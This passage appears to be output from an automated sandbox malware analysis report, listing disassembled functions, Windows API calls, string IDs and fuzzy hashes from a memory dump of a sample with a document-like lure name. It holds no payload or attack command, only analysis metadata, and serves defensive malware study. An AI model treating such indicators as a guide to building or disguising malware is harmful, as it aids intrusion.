                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ClassMessageNameSend_memmove
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 372448540-1403004172
                                                        • Opcode ID: d9b0764d1afcb5d3ef5d498347f9542e8645dac6287a8be2f52a90c315c71d14
                                                        • Instruction ID: a0d1b848b6f6248318b8ed0c09ac329ebd3d705a8c5a1cf4f5ff559dbdfafe91
                                                        • Opcode Fuzzy Hash: d9b0764d1afcb5d3ef5d498347f9542e8645dac6287a8be2f52a90c315c71d14
                                                        • Instruction Fuzzy Hash: DA01F5B1601229EB8B18EBA4CC46DFE736CFF06360B14061DF836A72E1DE356848C651
                                                        Function 00828D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: __fread_nolock_memmove
                                                        • String ID: EA06
                                                        • API String ID: 1988441806-3962188686
                                                        • Opcode ID: b0dc8472f1a4fdc9827a92db1f6261f2c6a84b641ab828efcbd05ccfbed42975
                                                        • Instruction ID: 48c2301754d8e438aed237873f028c1d86d920a5a445bd5c883d340cbec10571
                                                        • Opcode Fuzzy Hash: b0dc8472f1a4fdc9827a92db1f6261f2c6a84b641ab828efcbd05ccfbed42975
                                                        • Instruction Fuzzy Hash: 8D01F971904258BEDF18CAA9C81AEFE7BF8DB15311F00459AF552D2181E878E60887A0
                                                        Function 00818CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007C7DE1: _memmove.LIBCMT ref: 007C7E22
                                                          • Part of subcall function 0081AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0081AABC
                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 00818D6B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ClassMessageNameSend_memmove
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 372448540-1403004172
                                                        • Opcode ID: 77f3150b55f321474aedbc47d303b313d90b902d2d4fdd7d6183643240c456d3
                                                        • Instruction ID: 02f7295275862f3b2bb03919ad92c215a130965e814abed94e858c201aa47b80
                                                        • Opcode Fuzzy Hash: 77f3150b55f321474aedbc47d303b313d90b902d2d4fdd7d6183643240c456d3
                                                        • Instruction Fuzzy Hash: 0601D4B1B41209EBDB18EBA0C956EFE73ACEF15340F10002DB806E32E1DE255E48D672
                                                        Function 00818D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007C7DE1: _memmove.LIBCMT ref: 007C7E22
                                                          • Part of subcall function 0081AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0081AABC
                                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 00818DEE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ClassMessageNameSend_memmove
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 372448540-1403004172
                                                        • Opcode ID: cc6889623f0ea3382b72eec8a2e16872dd3f261625d72bb3b904eb90c427d9b9
                                                        • Instruction ID: 9aa158f58280de13e599ef9d11c999db05ba42743a33e45371a1625c854956dc
                                                        • Opcode Fuzzy Hash: cc6889623f0ea3382b72eec8a2e16872dd3f261625d72bb3b904eb90c427d9b9
                                                        • Instruction Fuzzy Hash: 2B01F7B1B41209E7CB14E6A4C946EFE73ACEF15340F10402DB806F3292DE255E48D672
                                                        Function 0084C57D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007C2612: GetWindowLongW.USER32(?,000000EB), ref: 007C2623
                                                        • DefDlgProcW.USER32(?,0000002B,?,?,?,?,?,?,?,007FB93A,?,?,?), ref: 0084C5F1
                                                          • Part of subcall function 007C25DB: GetWindowLongW.USER32(?,000000EB), ref: 007C25EC
                                                        • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 0084C5D7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: LongWindow$MessageProcSend
                                                        • String ID: 0R
                                                        • API String ID: 982171247-1916035689
                                                        • Opcode ID: b78b944e2460bf1a394c8447c8ceb0965784a16d0da18df176d91e0c30d769fa
                                                        • Instruction ID: 3256262243c447501dc02481a1e841b17accac3fda8bc278efa00d58cd56886e
                                                        • Opcode Fuzzy Hash: b78b944e2460bf1a394c8447c8ceb0965784a16d0da18df176d91e0c30d769fa
                                                        • Instruction Fuzzy Hash: 6101D835201208EBCB255F18DC48F6F3BA6FF85364F154129FA559B2E1CB31A812DB51
                                                        Function 00824F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ClassName_wcscmp
                                                        • String ID: #32770
                                                        • API String ID: 2292705959-463685578
                                                        • Opcode ID: 2d4a69a64efa65013307b0bdb0325f0eaf5cb6faee12fbc82f405f6e9b00e855
                                                        • Instruction ID: 69fa3442308048fa48aa463d615e08831a19e7a916ad00f90a18160fba4f4afb
                                                        • Opcode Fuzzy Hash: 2d4a69a64efa65013307b0bdb0325f0eaf5cb6faee12fbc82f405f6e9b00e855
                                                        • Instruction Fuzzy Hash: 6CE092326042286AE7209BA9AC49AA7F7ACFB85B60F00006AFD14D3151E9649A558BE0
                                                        Function 007FB2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007FB314: _memset.LIBCMT ref: 007FB321
                                                          • Part of subcall function 007E0940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,007FB2F0,?,?,?,007C100A), ref: 007E0945
                                                        • IsDebuggerPresent.KERNEL32(?,?,?,007C100A), ref: 007FB2F4
                                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,007C100A), ref: 007FB303
                                                        Strings
                                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 007FB2FE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                        • API String ID: 3158253471-631824599
                                                        • Opcode ID: 16a2358ec13ae45845d53372df45214bddcca929c1cc6ec43197ffc7c9623338
                                                        • Instruction ID: 36f703420504df597734a8349159174c96dcb785bd8216eb2ac031aa46b8c277
                                                        • Opcode Fuzzy Hash: 16a2358ec13ae45845d53372df45214bddcca929c1cc6ec43197ffc7c9623338
                                                        • Instruction Fuzzy Hash: 51E039746007108BD7209F68D4087527AE4FF04368F01897DE556C6342EBB9A444CBA1
                                                        Function 00801935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSystemDirectoryW.KERNEL32(?), ref: 00801775
                                                          • Part of subcall function 0083BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,0080195E,?), ref: 0083BFFE
                                                          • Part of subcall function 0083BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0083C010
                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0080196D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                        • String ID: WIN_XPe
                                                        • API String ID: 582185067-3257408948
                                                        • Opcode ID: 02f69c1523ff2c70d5a6150a284030ce5ea8b5508beb1967fff01a9990243337
                                                        • Instruction ID: 33d9c7f222b3e7652426ad89c25d9cf7564407673e5e2133e372af5b56491ff1
                                                        • Opcode Fuzzy Hash: 02f69c1523ff2c70d5a6150a284030ce5ea8b5508beb1967fff01a9990243337
                                                        • Instruction Fuzzy Hash: D7F01570801008DFCB55DB94CD88AECBBB8FB08314F540099E102A2195D7308E84CF61
                                                        Function 00845998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008459AE
                                                        • PostMessageW.USER32(00000000), ref: 008459B5
                                                          • Part of subcall function 00825244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008252BC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: FindMessagePostSleepWindow
                                                        • String ID: Shell_TrayWnd
                                                        • API String ID: 529655941-2988720461
                                                        • Opcode ID: 9bbd718dca7021305f3e0837000d61a50276d8eba4d5355a98738b7df5cc9bd3
                                                        • Instruction ID: 5c3def68d2d2de892d3cc396ae7f6c657814d7975c62fb15a69adbc1c21596ee
                                                        • Opcode Fuzzy Hash: 9bbd718dca7021305f3e0837000d61a50276d8eba4d5355a98738b7df5cc9bd3
                                                        • Instruction Fuzzy Hash: 41D0C9357C0311BAE6A4AB70AC0FF966614FB15B50F010829B359EA1D1D9E4A800CA54
                                                        Function 00845964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0084596E
                                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00845981
                                                          • Part of subcall function 00825244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008252BC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: FindMessagePostSleepWindow
                                                        • String ID: Shell_TrayWnd
                                                        • API String ID: 529655941-2988720461
                                                        • Opcode ID: 5caa23483029c6a13ba02b38b0551c6b89bbc442679e75dd5627db596bbd0af2
                                                        • Instruction ID: 1409a7ea5aad3f5b221e95980da6879b23edd0c7b149611bea595120a6ac054c
                                                        • Opcode Fuzzy Hash: 5caa23483029c6a13ba02b38b0551c6b89bbc442679e75dd5627db596bbd0af2
                                                        • Instruction Fuzzy Hash: AFD0C9357C4311B6E6A4AB70AC0FF966A14FB11B50F010829B359EA1D1D9E49800CA54